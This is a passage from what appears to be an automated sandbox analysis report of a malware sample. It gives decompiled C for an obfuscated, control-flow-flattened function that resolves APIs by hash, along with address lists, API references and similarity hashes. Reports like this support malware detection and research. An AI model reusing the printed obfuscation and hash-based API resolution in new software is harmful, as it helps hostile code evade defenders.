					SendMessageA( *(_t16 + 0x1c), 0x111, 0xe146, 0);
					_t11 = 1;
					return _t11;
				}
			}

0x00415811
0x0041581d
0x00415865
0x00000000
0x00415867
0x00415824
0x00415828
0x00000000
0x0041584b
0x0041585a
0x00415862
0x00000000
0x00415862

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetKeyState.USER32(00000010), ref: 00415832
GetKeyState.USER32(00000011), ref: 0041583B
GetKeyState.USER32(00000012), ref: 00415844
SendMessageA.USER32 ref: 0041585A

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
Instruction ID: 667728aae4084d5946ddf495d1d29dbc27f199ee829e175ed2889692379dfdac
Opcode Fuzzy Hash: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
Instruction Fuzzy Hash: 47F0E232740746E5E63036931C42FD913144FC0BD4F45083AB701AE1D18A9988E30278

Uniqueness

Uniqueness Score: -1.00%

Function 006080CE, Relevance: 5.6, Strings: 4, Instructions: 596COMMON

Download Yara Rule

Strings

W$, xrefs: 00608646
ke@5, xrefs: 0060890D
l!`u, xrefs: 00608991
ke@5, xrefs: 0060889F

Memory Dump Source

Source File: 00000000.00000002.230964663.0000000000600000.00000040.00000001.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: W$$ke@5$ke@5$l!`u
API String ID: 0-26469448
Opcode ID: 2884b0bae5a6a19bce542e2dc18d18ab15a0ccbe2a39f1a83be921a77ecd1377
Instruction ID: cd164dde2db451f0703e2ff67844adaa4e53bf2dcb7669cd3f7b3f6906e6af4d
Opcode Fuzzy Hash: 2884b0bae5a6a19bce542e2dc18d18ab15a0ccbe2a39f1a83be921a77ecd1377
Instruction Fuzzy Hash: 8F2290316893018FC6ACEE68D54516F76E3AB90740F14492EF4C6DB3E2DE60CD498B9B

Uniqueness

Uniqueness Score: -1.00%

Function 021E6530, Relevance: 5.6, Strings: 4, Instructions: 596
COMMONCrypto

Download Yara Rule

C-Code - Quality: 80%

			E021E6530(void* __edx) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v48;
				char _v76;
				signed int _v80;
				char _v88;
				char _v96;
				char _v100;
				char _v104;
				char _v112;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* __ebx;
				void* __ebp;
				void* _t198;
				void* _t200;
				signed int _t207;
				signed int _t209;
				signed int _t214;
				signed int _t220;
				void* _t222;
				void* _t223;
				void* _t224;
				signed int _t225;
				intOrPtr* _t227;
				signed int _t228;
				void* _t229;
				void* _t230;
				signed int _t234;
				signed int _t236;
				void* _t237;
				signed int _t240;
				intOrPtr* _t241;
				signed int _t242;
				void* _t243;
				void* _t244;
				signed int _t249;
				void* _t254;
				signed int _t255;
				intOrPtr* _t256;
				void* _t257;
				intOrPtr* _t258;
				signed int _t259;
				void* _t260;
				signed int _t272;
				signed int _t274;
				void* _t276;
				signed int _t280;
				signed int _t285;
				intOrPtr* _t287;
				signed int _t293;
				signed int _t300;
				signed int _t304;
				intOrPtr _t308;
				signed int _t318;
				signed int _t347;
				signed int _t348;
				signed int _t369;
				signed int _t371;
				void* _t375;
				signed int _t385;
				signed int _t391;
				signed int _t396;
				void* _t398;
				void* _t400;
				void* _t401;
				void* _t402;
				void* _t403;

				_t398 = (_t396 & 0xfffffff8) - 0x80;
				_t300 = _v120;
				_t191 = 0x12823d32;
				_t391 = _v124;
				while(1) {
					L1:
					_t375 = 0x2564be4f;
					do {
						while(1) {
							L2:
							_t400 = _t191 - 0x1ff46034;
							if(_t400 > 0) {
								goto L60;
							}
							L3:
							if(_t400 == 0) {
								return E021EB160();
							} else {
								_t401 = _t191 - 0xfd5a1ac;
								if(_t401 > 0) {
									__eflags = _t191 - 0x16bf64f2;
									if(__eflags > 0) {
										__eflags = _t191 - 0x1ea773fc;
										if(__eflags > 0) {
											__eflags = _t191 - 0x1fdef138;
											if(_t191 != 0x1fdef138) {
												break;
											} else {
												_v8 =  *((intOrPtr*)( *0x21ee2ec + 0x48));
												_t191 = 0x1ea773fc;
												continue;
											}
										} else {
											if(__eflags == 0) {
												_v40 = E021E5360(_t300, _t391);
												_t191 = 0x216a974b;
												continue;
											} else {
												__eflags = _t191 - 0x1c32e2d2;
												if(_t191 == 0x1c32e2d2) {
													E021E4250(_t300, _v112);
													_t191 = 0x39deb3f9;
													continue;
												} else {
													__eflags = _t191 - 0x1c5e7f9f;
													if(_t191 != 0x1c5e7f9f) {
														break;
													} else {
														_t191 = 0x30d1bd42;
														continue;
													}
												}
											}
										}
									} else {
										if(__eflags == 0) {
											_t272 = E021E5F60( &_v76, _t347, _t391);
											__eflags = _t272;
											if(_t272 == 0) {
												L77:
												_t191 = 0x1ff46034;
											} else {
												_v48 =  &_v76;
												_t274 =  *0x21ee144;
												__eflags = _t274;
												if(_t274 == 0) {
													_t276 = E021E3F20(0xbb398380);
													_t347 = 0x5262aeca;
													_t274 = E021E3E80(_t300, _t276, 0x5262aeca, _t391);
													 *0x21ee144 = _t274;
												}
												_t327 =  &_v76;
												_v48 =  *_t274( &_v76);
												_t191 = 0x1fdef138;
											}
											continue;
										} else {
											__eflags = _t191 - 0x14860a92;
											if(__eflags > 0) {
												__eflags = _t191 - 0x166b1152;
												if(_t191 != 0x166b1152) {
													break;
												} else {
													E021E8EA0();
													_t191 = 0x1381dc55;
													continue;
												}
											} else {
												if(__eflags == 0) {
													E021E8550(_t300);
													_t191 = 0x2aa5d516;
													continue;
												} else {
													__eflags = _t191 - 0x12823d32;
													if(_t191 == 0x12823d32) {
														_t191 = 0x27047861;
														continue;
													} else {
														__eflags = _t191 - 0x1381dc55;
														if(_t191 != 0x1381dc55) {
															break;
														} else {
															E021E9470(_t391);
															_t191 = 0x315a7589;
															continue;
														}
													}
												}
											}
										}
									}
								} else {
									if(_t401 == 0) {
										_t280 = E021E90C0();
										asm("sbb eax, eax");
										_t191 = ( ~_t280 & 0x0810ea45) + 0xb70f210;
										continue;
									} else {
										_t402 = _t191 - 0xd28318f;
										if(_t402 > 0) {
											__eflags = _t191 - 0xe9d6a0f;
											if(__eflags > 0) {
												__eflags = _t191 - 0xf0c159c;
												if(_t191 != 0xf0c159c) {
													break;
												} else {
													_t209 = E021E96B0();
													__eflags = _t209;
													if(_t209 == 0) {
														L142:
														return _t209;
													} else {
														_t191 = 0xfd5a1ac;
														continue;
													}
												}
											} else {
												if(__eflags == 0) {
													E021E7EC0();
													__eflags =  *( *0x21ee2ec + 0x268);
													_t191 =  !=  ? 0x21c0adc4 : 0x14860a92;
													continue;
												} else {
													__eflags = _t191 - 0xddcb99d;
													if(_t191 == 0xddcb99d) {
														_t285 = E021EB2B0( &_v88, _t391);
														__eflags = _t285;
														if(_t285 != 0) {
															asm("xorps xmm0, xmm0");
															_t391 = 0x8e1a01c;
															asm("movlpd [esp+0x18], xmm0");
															_t300 = _v120;
														}
														L30:
														_t191 = 0xa28b6e5;
														continue;
													} else {
														__eflags = _t191 - 0xe0d6cd8;
														if(_t191 != 0xe0d6cd8) {
															break;
														} else {
															E021E9D70(_t300);
															_t347 = 0xcfd93ac1;
															_t391 = 0x1c5e7f9f;
															_t287 = E021E4190(_t300, 0xbb398380, 0xcfd93ac1, 0x1c5e7f9f, 0xcf);
															_t398 = _t398 + 4;
															 *_t287();
															_t300 = 0xcfd93ac1;
															L27:
															_t191 = 0x2537e9de;
															continue;
														}
													}
												}
											}
										} else {
											if(_t402 == 0) {
												_v124 = 0x669c;
												_t347 = 0xcccccccd * _v124 >> 0x20 >> 5;
												_v124 = _t347;
												_v124 = _v124 ^ 0x00000178;
												_v28 = _v124;
												_t191 = 0x8e1a01c;
												continue;
											} else {
												_t403 = _t191 - 0x8e1a01c;
												if(_t403 > 0) {
													__eflags = _t191 - 0xa28b6e5;
													if(_t191 == 0xa28b6e5) {
														E021E4250(_t300, _v96);
														_t191 = 0x1c32e2d2;
														continue;
													} else {
														__eflags = _t191 - 0xb70f210;
														if(_t191 != 0xb70f210) {
															break;
														} else {
															_t293 = E021E8240(_t300, _t391);
															_t308 =  *0x21ee2ec;
															__eflags = _t293;
															if(_t293 == 0) {
																__eflags =  *(_t308 + 0x268);
																_t191 =  !=  ? 0x3278b521 : 0x166b1152;
															} else {
																__eflags =  *(_t308 + 0x268);
																_t191 =  !=  ? _t375 : 0xe0d6cd8;
															}
															continue;
														}
													}
												} else {
													if(_t403 == 0) {
														E021E60E0( &_v24);
														_t191 = 0x4326e25;
														while(1) {
															L2:
															_t400 = _t191 - 0x1ff46034;
															if(_t400 > 0) {
																goto L60;
															}
															goto L3;
														}
														goto L60;
													} else {
														if(_t191 == 0x2c8787f) {
															E021E8530();
															_t191 = 0xddcb99d;
															while(1) {
																L2:
																_t400 = _t191 - 0x1ff46034;
																if(_t400 > 0) {
																	goto L60;
																}
																goto L3;
															}
														} else {
															if(_t191 != 0x4326e25) {
																break;
															} else {
																E021EB050( &_v16);
																_t191 = 0x2b42ebb2;
																while(1) {
																	L2:
																	_t400 = _t191 - 0x1ff46034;
																	if(_t400 > 0) {
																		goto L60;
																	}
																	goto L3;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
							L143:
							L60:
							__eflags = _t191 - 0x2b42ebb2;
							if(__eflags > 0) {
								__eflags = _t191 - 0x3299e430;
								if(__eflags > 0) {
									__eflags = _t191 - 0x39deb3f9;
									if(__eflags > 0) {
										__eflags = _t191 - 0x39f8f5db;
										if(_t191 != 0x39f8f5db) {
											break;
										} else {
											_v124 = 0xaaf5;
											_t391 = 0x16bf64f2;
											_v124 = _v124 >> 3;
											_v124 = _v124 + 0xffff9253;
											_v124 = _v124 ^ 0xffff9931;
											_v128 = 0xf5b3;
											_v128 = _v128 + 0xb403;
											_v128 = _v128 + 0xffff5bc8;
											_v128 = _v128 + 0x6fbb;
											_v128 = _v128 + 0xe315;
											_v128 = _v128 | 0x5d55179d;
											_v128 = _v128 + 0xafac;
											_v128 = _v128 << 2;
											_v128 = _v128 ^ 0x7560216c;
											_t157 =  &_v128; // 0x7560216c
											__eflags = _v124 -  *_t157;
											if(_v124 <=  *_t157) {
												__eflags = 0;
											} else {
												_t348 =  *0x21edd4c;
												__eflags = _t348;
												if(_t348 == 0) {
													_t348 = E021E3E80(_t300, E021E3F20(0xbb398380), 0xae3c1a47, 0x16bf64f2);
													 *0x21edd4c = _t348;
												}
												_v124 = 0xaaf5;
												_v124 = _v124 >> 3;
												_v124 = _v124 + 0xffff9253;
												_v124 = _v124 ^ 0xffff9931;
												_t200 = E021E5E10();
												_t347 =  *_t348() % (_v124 - _t200);
											}
											_t318 =  *0x21eddbc; // 0x0
											__eflags = _t318;
											if(_t318 == 0) {
												_t198 = E021E3F20(0xbb398380);
												_t347 = 0xcfd93ac1;
												_t318 = E021E3E80(_t300, _t198, 0xcfd93ac1, _t391);
												 *0x21eddbc = _t318;
											}
											_v128 = 0xf5b3;
											_v128 = _v128 + 0xb403;
											_v128 = _v128 + 0xffff5bc8;
											_v128 = _v128 + 0x6fbb;
											_v128 = _v128 + 0xe315;
											_v128 = _v128 | 0x5d55179d;
											_v128 = _v128 + 0xafac;
											_v128 = _v128 << 2;
											_v128 = _v128 ^ 0x7560216c;
											 *_t318();
											_t300 = _t347;
											_t191 = 0x2537e9de;
											asm("adc ebx, 0x0");
											goto L1;
										}
									} else {
										if(__eflags == 0) {
											E021E4250(_t300, _v16);
											_t191 = 0x3540656b;
											continue;
										} else {
											__eflags = _t191 - 0x3540656b;
											if(_t191 == 0x3540656b) {
												E021E4250(_t300, _v24);
												_t191 = 0x2537e9de;
												continue;
											} else {
												__eflags = _t191 - 0x380a1784;
												if(_t191 != 0x380a1784) {
													break;
												} else {
													_t347 =  &_v88;
													_t207 = E021E74E0( &_v96, _t347);
													__eflags = _t207;
													if(_t207 == 0) {
														goto L30;
													} else {
														E021EAE60(0);
														_t327 = _v80;
														_t191 = 0x2c8787f;
														__eflags = _t327;
														if(_t327 != 0) {
															__eflags = _t327 - 7;
															_t327 = 0x3299e430;
															_t191 =  ==  ? 0x3299e430 : 0x2c8787f;
														}
													}
													continue;
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										_t209 = E021E8590(_t391);
										goto L142;
									} else {
										__eflags = _t191 - 0x315a7589;
										if(__eflags > 0) {
											__eflags = _t191 - 0x3278b521;
											if(_t191 != 0x3278b521) {
												break;
											} else {
												E021E8CD0();
												_t191 = 0x166b1152;
												continue;
											}
										} else {
											if(__eflags == 0) {
												_t209 = E021E8A10();
												__eflags = _t209;
												if(_t209 == 0) {
													goto L142;
												} else {
													_t191 = 0xe9d6a0f;
													continue;
												}
											} else {
												__eflags = _t191 - 0x30d1bd42;
												if(_t191 == 0x30d1bd42) {
													_t347 =  &_v100;
													_v104 = E021E3310(0x21ed2e0, _t347);
													E021E1890( &_v104);
													E021E3460(_t211);
													_t191 = 0x314203dc;
													while(1) {
														L1:
														_t375 = 0x2564be4f;
														goto L2;
													}
												} else {
													__eflags = _t191 - 0x314203dc;
													if(_t191 != 0x314203dc) {
														break;
													} else {
														_t191 = 0x39f8f5db;
														continue;
													}
												}
											}
										}
									}
								}
							} else {
								if(__eflags == 0) {
									_t347 =  &_v112;
									_t327 =  &_v48;
									_t214 = E021E72A0( &_v48, _t347);
									asm("sbb eax, eax");
									_t191 = ( ~_t214 & 0xf0f0f5bd) + 0x39deb3f9;
									continue;
								} else {
									__eflags = _t191 - 0x2564be4f;
									if(__eflags > 0) {
										__eflags = _t191 - 0x2aa5d516;
										if(__eflags > 0) {
											__eflags = _t191 - 0x2acfa9b6;
											if(_t191 != 0x2acfa9b6) {
												break;
											} else {
												_v128 = 0xe36c;
												_t347 =  &_v112;
												_v128 = _v128 * 0x71;
												_v128 = _v128 + 0xffff86a2;
												_v128 = _v128 * 0x7b;
												_v128 = _v128 >> 6;
												_v128 = _v128 | 0x57610b65;
												_v128 = _v128 ^ 0x57e10f64;
												_t220 = E021E12B0(_v128, _t347,  &_v96);
												_t398 = _t398 + 4;
												__eflags = _t220;
												if(_t220 == 0) {
													_t327 =  *0x21ee2e0;
													 *(_t327 + 0xc) =  &(( *(_t327 + 0xc))[2]);
													__eflags =  *( *(_t327 + 0xc));
													if( *( *(_t327 + 0xc)) == 0) {
														 *(_t327 + 0xc) =  *(_t327 + 8);
													}
													_v128 = 0xc5a1;
													_t391 = 0x8e1a01c;
													_v128 = _v128 ^ 0xe0738efa;
													_v128 = _v128 >> 6;
													_v128 = _v128 + 0xffffe737;
													_v128 = _v128 ^ 0x0381bbc4;
													_t222 = E021E5D50();
													__eflags = _v128 - _t222;
													if(_v128 <= _t222) {
														_t304 = 0;
														__eflags = 0;
													} else {
														_t227 = E021E4190(_t300, 0xbb398380, 0xae3c1a47, 0x8e1a01c, 0xb3);
														_t398 = _t398 + 4;
														_t228 =  *_t227();
														_t229 = E021E5D50();
														_t230 = E021E5D20();
														_t327 = _t230 - _t229;
														_t347 = _t228 % (_t230 - _t229);
														_t304 = _t347;
													}
													_t369 =  *0x21eddbc; // 0x0
													__eflags = _t369;
													if(_t369 == 0) {
														_t225 = E021E3F20(0xbb398380);
														_t347 = 0xcfd93ac1;
														_t327 = _t225;
														_t369 = E021E3E80(_t304, _t225, 0xcfd93ac1, _t391);
														 *0x21eddbc = _t369;
													}
													_t223 = E021E5D50();
													_t224 =  *_t369();
													_t300 = _t347;
													_t371 = _t224 + _t304 + _t223;
													_t191 = 0x1c32e2d2;
													asm("adc ebx, 0x0");
												} else {
													_v124 = 0xb2e0;
													_t391 = 0x8e1a01c;
													_t234 = _v124;
													_t327 = (_t234 << 4) - _t234 << 2;
													_v124 = (_t234 << 4) - _t234 << 2;
													_v124 = _v124 ^ 0x00245720;
													_v128 = 0x89fa;
													_v128 = _v128 + 0xffffb442;
													_v128 = _v128 + 0xffffdaaf;
													_v128 = _v128 >> 0xb;
													_v128 = _v128 ^ 0x000c3503;
													__eflags = _v124 - _v128;
													if(_v124 <= _v128) {
														_t385 = 0;
														__eflags = 0;
													} else {
														_t241 = E021E4190(_t300, 0xbb398380, 0xae3c1a47, 0x8e1a01c, 0xb3);
														_t398 = _t398 + 4;
														_t242 =  *_t241();
														_t243 = E021E5DC0();
														_t244 = E021E5D90();
														_t327 = _t244 - _t243;
														_t347 = _t242 % (_t244 - _t243);
														_t385 = _t347;
													}
													_t236 =  *0x21eddbc; // 0x0
													__eflags = _t236;
													if(_t236 == 0) {
														_t240 = E021E3F20(0xbb398380);
														_t347 = 0xcfd93ac1;
														_t327 = _t240;
														_t236 = E021E3E80(_t300, _t240, 0xcfd93ac1, _t391);
														 *0x21eddbc = _t236;
													}
													_v128 = 0x89fa;
													_v128 = _v128 + 0xffffb442;
													_v128 = _v128 + 0xffffdaaf;
													_v128 = _v128 >> 0xb;
													_v128 = _v128 ^ 0x000c3503;
													_t237 =  *_t236();
													_t300 = _t347;
													_t371 = _t237 + _v128 + _t385;
													_t191 = 0x380a1784;
													asm("adc ebx, 0x0");
												}
												while(1) {
													L1:
													_t375 = 0x2564be4f;
													goto L2;
												}
											}
										} else {
											if(__eflags == 0) {
												return E021E8BA0(_t327, _t391);
											} else {
												__eflags = _t191 - 0x27047861;
												if(_t191 == 0x27047861) {
													_t209 = E021E7160(_t300);
													__eflags = _t209;
													if(_t209 == 0) {
														goto L142;
													} else {
														_t191 = 0x226f6c18;
														continue;
													}
												} else {
													__eflags = _t191 - 0x27dc0a4c;
													if(_t191 != 0x27dc0a4c) {
														break;
													} else {
														_v32 = E021E5EA0();
														_t191 = 0xd28318f;
														continue;
													}
												}
											}
										}
									} else {
										if(__eflags == 0) {
											_t249 = E021E9320(_t391);
											asm("sbb eax, eax");
											_t191 = ( ~_t249 & 0x1c98683e) + 0xe0d6cd8;
											continue;
										} else {
											__eflags = _t191 - 0x226f6c18;
											if(__eflags > 0) {
												__eflags = _t191 - 0x2537e9de;
												if(_t191 != 0x2537e9de) {
													break;
												} else {
													__eflags = _t371 | _t300;
													if((_t371 | _t300) == 0) {
														L81:
														_t191 = _t391;
														break;
													} else {
														_v128 = 0x1f9e;
														_v128 = _v128 >> 0xc;
														_v128 = _v128 + 0xffff30c3;
														_v128 = _v128 ^ 0xffff3064;
														_t254 = E021E5CD0();
														__eflags = _t254 - _v128;
														if(_t254 <= _v128) {
															_t347 = 0;
															__eflags = 0;
														} else {
															_t258 = E021E4190(_t300, 0xbb398380, 0xae3c1a47, _t391, 0xb3);
															_t398 = _t398 + 4;
															_t259 =  *_t258();
															_t260 = E021E5CD0();
															_t347 = _t259 % (_t260 - E021E5D00());
															_t375 = 0x2564be4f;
														}
														_v128 = 0x1f9e;
														_v128 = _v128 >> 0xc;
														_v128 = _v128 + 0xffff30c3;
														_v128 = _v128 ^ 0xffff3064;
														_t327 = _v128 + _t347;
														_t255 = E021E9EA0(_t300, _v128 + _t347);
														__eflags = _t255;
														if(_t255 == 0) {
															_t347 = 0xcfd93ac1;
															_t327 = 0xbb398380;
															_t256 = E021E4190(_t300, 0xbb398380, 0xcfd93ac1, _t391, 0xcf);
															_t398 = _t398 + 4;
															_t257 =  *_t256();
															__eflags = 0xcfd93ac1 - _t300;
															if(__eflags < 0) {
																goto L27;
															} else {
																if(__eflags > 0) {
																	goto L81;
																} else {
																	__eflags = _t257 - _t371;
																	if(_t257 < _t371) {
																		goto L27;
																	} else {
																		goto L81;
																	}
																}
															}
														} else {
															goto L77;
														}
													}
												}
											} else {
												if(__eflags == 0) {
													E021E6FB0(_t300);
													_t191 = 0xf0c159c;
													continue;
												} else {
													__eflags = _t191 - 0x216a974b;
													if(_t191 == 0x216a974b) {
														_v36 = E021E47A0(_t300, _t391);
														_t191 = 0x27dc0a4c;
														continue;
													} else {
														__eflags = _t191 - 0x21c0adc4;
														if(_t191 != 0x21c0adc4) {
															break;
														} else {
															E021E87D0();
															_t191 = 0x14860a92;
															continue;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L143;
						}
						__eflags = _t191 - 0x33f417f9;
					} while (_t191 != 0x33f417f9);
					return _t191;
					goto L143;
				}
			}

0x021e6536
0x021e653d
0x021e6541
0x021e6547
0x021e6551
0x021e6551
0x021e6551
0x021e6560
0x021e6560
0x021e6560
0x021e6560
0x021e6565
0x00000000
0x00000000
0x021e656b
0x021e656b
0x021e6ef5
0x021e6571
0x021e6571
0x021e6576
0x021e674d
0x021e6752
0x021e6809
0x021e680e
0x021e6854
0x021e6859
0x00000000
0x021e685f
0x021e6867
0x021e686e
0x00000000
0x021e686e
0x021e6810
0x021e6810
0x021e6846
0x021e684a
0x00000000
0x021e6812
0x021e6812
0x021e6817
0x021e6832
0x021e6837
0x00000000
0x021e6819
0x021e6819
0x021e681e
0x00000000
0x021e6824
0x021e6824
0x00000000
0x021e6824
0x021e681e
0x021e6817
0x021e6810
0x021e6758
0x021e6758
0x021e67bb
0x021e67c0
0x021e67c2
0x021e6987
0x021e6987
0x021e67c8
0x021e67cc
0x021e67d0
0x021e67d5
0x021e67d7
0x021e67de
0x021e67e3
0x021e67ea
0x021e67ef
0x021e67ef
0x021e67f4
0x021e67fb
0x021e67ff
0x021e67ff
0x00000000
0x021e675a
0x021e675a
0x021e675f
0x021e679d
0x021e67a2
0x00000000
0x021e67a8
0x021e67a8
0x021e67ad
0x00000000
0x021e67ad
0x021e6761
0x021e6761
0x021e678e
0x021e6793
0x00000000
0x021e6763
0x021e6763
0x021e6768
0x021e6784
0x00000000
0x021e676a
0x021e676a
0x021e676f
0x00000000
0x021e6775
0x021e6775
0x021e677a
0x00000000
0x021e677a
0x021e676f
0x021e6768
0x021e6761
0x021e675f
0x021e6758
0x021e657c
0x021e657c
0x021e6735
0x021e673c
0x021e6743
0x00000000
0x021e6582
0x021e6582
0x021e6587
0x021e6672
0x021e6677
0x021e6713
0x021e6718
0x00000000
0x021e671e
0x021e671e
0x021e6723
0x021e6725
0x021e6f08
0x021e6f0f
0x021e672b
0x021e672b
0x00000000
0x021e672b
0x021e6725
0x021e667d
0x021e667d
0x021e66ef
0x021e66ff
0x021e670b
0x00000000
0x021e667f
0x021e667f
0x021e6684
0x021e66c6
0x021e66cb
0x021e66cd
0x021e66cf
0x021e66d2
0x021e66d7
0x021e66dd
0x021e66e1
0x021e66e5
0x021e66e5
0x00000000
0x021e6686
0x021e6686
0x021e668b
0x00000000
0x021e6691
0x021e6691
0x021e669b
0x021e66a5
0x021e66aa
0x021e66af
0x021e66b2
0x021e66b6
0x021e66b8
0x021e66b8
0x00000000
0x021e66b8
0x021e668b
0x021e6684
0x021e667d
0x021e658d
0x021e658d
0x021e663e
0x021e6651
0x021e6654
0x021e6658
0x021e6664
0x021e6668
0x00000000
0x021e6593
0x021e6593
0x021e6598
0x021e65dd
0x021e65e2
0x021e662f
0x021e6634
0x00000000
0x021e65e4
0x021e65e4
0x021e65e9
0x00000000
0x021e65ef
0x021e65ef
0x021e65f4
0x021e65fa
0x021e65fc
0x021e6612
0x021e6623
0x021e65fe
0x021e65fe
0x021e660a
0x021e660a
0x00000000
0x021e65fc
0x021e65e9
0x021e659a
0x021e659a
0x021e65d1
0x021e65d6
0x021e6560
0x021e6560
0x021e6560
0x021e6565
0x00000000
0x00000000
0x00000000
0x021e6565
0x00000000
0x021e659c
0x021e65a1
0x021e65c1
0x021e65c6
0x021e6560
0x021e6560
0x021e6560
0x021e6565
0x00000000
0x00000000
0x00000000
0x021e6565
0x021e65a3
0x021e65a8
0x00000000
0x021e65ae
0x021e65b5
0x021e65ba
0x021e6560
0x021e6560
0x021e6560
0x021e6565
0x00000000
0x00000000
0x00000000
0x021e6565
0x021e6560
0x021e65a8
0x021e65a1
0x021e659a
0x021e6598
0x021e658d
0x021e6587
0x021e657c
0x021e6576
0x00000000
0x021e6878
0x021e6878
0x021e687d
0x021e6c63
0x021e6c68
0x021e6cf8
0x021e6cfd
0x021e6d79
0x021e6d7e
0x00000000
0x021e6d84
0x021e6d84
0x021e6d8c
0x021e6d91
0x021e6d96
0x021e6d9e
0x021e6da6
0x021e6dae
0x021e6db6
0x021e6dbe
0x021e6dc6
0x021e6dce
0x021e6dd6
0x021e6de6
0x021e6deb
0x021e6df3
0x021e6df7
0x021e6dfb
0x021e6e57
0x021e6dfd
0x021e6dfd
0x021e6e03
0x021e6e05
0x021e6e1d
0x021e6e1f
0x021e6e1f
0x021e6e25
0x021e6e2d
0x021e6e32
0x021e6e3a
0x021e6e42
0x021e6e51
0x021e6e53
0x021e6e59
0x021e6e5f
0x021e6e61
0x021e6e68
0x021e6e6d
0x021e6e79
0x021e6e7b
0x021e6e7b
0x021e6e81
0x021e6e89
0x021e6e91
0x021e6e99
0x021e6ea1
0x021e6ea9
0x021e6eb1
0x021e6ec1
0x021e6ec6
0x021e6ece
0x021e6ed2
0x021e6edc
0x021e6ee1
0x00000000
0x021e6ee1
0x021e6cff
0x021e6cff
0x021e6d6a
0x021e6d6f
0x00000000
0x021e6d01
0x021e6d01
0x021e6d06
0x021e6d54
0x021e6d59
0x00000000
0x021e6d08
0x021e6d08
0x021e6d0d
0x00000000
0x021e6d13
0x021e6d13
0x021e6d1b
0x021e6d20
0x021e6d22
0x00000000
0x021e6d28
0x021e6d2a
0x021e6d2f
0x021e6d33
0x021e6d38
0x021e6d3a
0x021e6d40
0x021e6d43
0x021e6d48
0x021e6d48
0x021e6d3a
0x00000000
0x021e6d22
0x021e6d0d
0x021e6d06
0x021e6cff
0x021e6c6e
0x021e6c6e
0x021e6f03
0x00000000
0x021e6c74
0x021e6c74
0x021e6c79
0x021e6cde
0x021e6ce3
0x00000000
0x021e6ce9
0x021e6ce9
0x021e6cee
0x00000000
0x021e6cee
0x021e6c7b
0x021e6c7b
0x021e6cc7
0x021e6ccc
0x021e6cce
0x00000000
0x021e6cd4
0x021e6cd4
0x00000000
0x021e6cd4
0x021e6c7d
0x021e6c7d
0x021e6c82
0x021e6c99
0x021e6cad
0x021e6cb1
0x021e6cb8
0x021e6cbd
0x021e6551
0x021e6551
0x021e6551
0x00000000
0x021e6556
0x021e6c84
0x021e6c84
0x021e6c89
0x00000000
0x021e6c8f
0x021e6c8f
0x00000000
0x021e6c8f
0x021e6c89
0x021e6c82
0x021e6c7b
0x021e6c79
0x021e6c6e
0x021e6883
0x021e6883
0x021e6c43
0x021e6c47
0x021e6c4b
0x021e6c52
0x021e6c59
0x00000000
0x021e6889
0x021e6889
0x021e688e
0x021e69e9
0x021e69ee
0x021e6a2e
0x021e6a33
0x00000000
0x021e6a35
0x021e6a35
0x021e6a3d
0x021e6a46
0x021e6a4a
0x021e6a57
0x021e6a5f
0x021e6a64
0x021e6a6c
0x021e6a79
0x021e6a7e
0x021e6a81
0x021e6a83
0x021e6b7a
0x021e6b80
0x021e6b87
0x021e6b8a
0x021e6b8f
0x021e6b8f
0x021e6b92
0x021e6b9a
0x021e6b9f
0x021e6ba7
0x021e6bac
0x021e6bb4
0x021e6bbc
0x021e6bc1
0x021e6bc5
0x021e6bfc
0x021e6bfc
0x021e6bc7
0x021e6bd6
0x021e6bdb
0x021e6bde
0x021e6be2
0x021e6be9
0x021e6bf2
0x021e6bf6
0x021e6bf8
0x021e6bf8
0x021e6bfe
0x021e6c04
0x021e6c06
0x021e6c0d
0x021e6c12
0x021e6c17
0x021e6c1e
0x021e6c20
0x021e6c20
0x021e6c26
0x021e6c2e
0x021e6c32
0x021e6c34
0x021e6c36
0x021e6c3b
0x021e6a89
0x021e6a89
0x021e6a91
0x021e6a96
0x021e6aa1
0x021e6aa4
0x021e6aa8
0x021e6ab0
0x021e6ab8
0x021e6ac0
0x021e6ac8
0x021e6acd
0x021e6ad9
0x021e6add
0x021e6b14
0x021e6b14
0x021e6adf
0x021e6aee
0x021e6af3
0x021e6af6
0x021e6afa
0x021e6b01
0x021e6b0a
0x021e6b0e
0x021e6b10
0x021e6b10
0x021e6b16
0x021e6b1b
0x021e6b1d
0x021e6b24
0x021e6b29
0x021e6b2e
0x021e6b30
0x021e6b35
0x021e6b35
0x021e6b3a
0x021e6b42
0x021e6b4a
0x021e6b52
0x021e6b57
0x021e6b5f
0x021e6b63
0x021e6b6b
0x021e6b6d
0x021e6b72
0x021e6b72
0x021e6551
0x021e6551
0x021e6551
0x00000000
0x021e6551
0x021e6551
0x021e69f0
0x021e69f0
0x021e6f02
0x021e69f6
0x021e69f6
0x021e69fb
0x021e6a17
0x021e6a1c
0x021e6a1e
0x00000000
0x021e6a24
0x021e6a24
0x00000000
0x021e6a24
0x021e69fd
0x021e69fd
0x021e6a02
0x00000000
0x021e6a04
0x021e6a09
0x021e6a0d
0x00000000
0x021e6a0d
0x021e6a02
0x021e69fb
0x021e69f0
0x021e6894
0x021e6894
0x021e69d1
0x021e69d8
0x021e69df
0x00000000
0x021e689a
0x021e689a
0x021e689f
0x021e68e6
0x021e68eb
0x00000000
0x021e68f1
0x021e68f3
